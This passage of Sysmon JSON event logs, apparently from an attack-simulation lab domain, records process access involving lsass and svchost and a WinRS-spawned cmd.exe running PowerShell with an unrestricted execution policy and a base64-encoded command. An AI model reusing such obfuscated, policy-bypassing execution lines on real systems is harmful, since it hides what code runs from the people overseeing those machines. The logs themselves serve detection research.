07:03:46.419","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","SourceProcessId":"1336","SourceThreadId":"1660","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010EF1A1200}","TargetProcessId":"4900","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9223,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9224,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9225,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":9226,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.443\r\nProcessGuid: {E2A3D6B1-13D2-5F25-0000-0010A11D1200}\r\nProcessId: 4988\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-13D2-5F25-0000-0020B61A1200}\r\nLogonId: 0x121AB6\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-13D2-5F25-0000-0010EF1A1200}\r\nParentProcessId: 4900\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.443","ProcessGuid":"{E2A3D6B1-13D2-5F25-0000-0010A11D1200}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-13D2-5F25-0000-0020B61A1200}","LogonId":"0x121ab6","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-13D2-5F25-0000-0010EF1A1200}","ParentProcessId":"4900","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9227,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010EF1A1200}\r\nSourceProcessId: 4900\r\nSourceThreadId: 2548\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010A11D1200}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 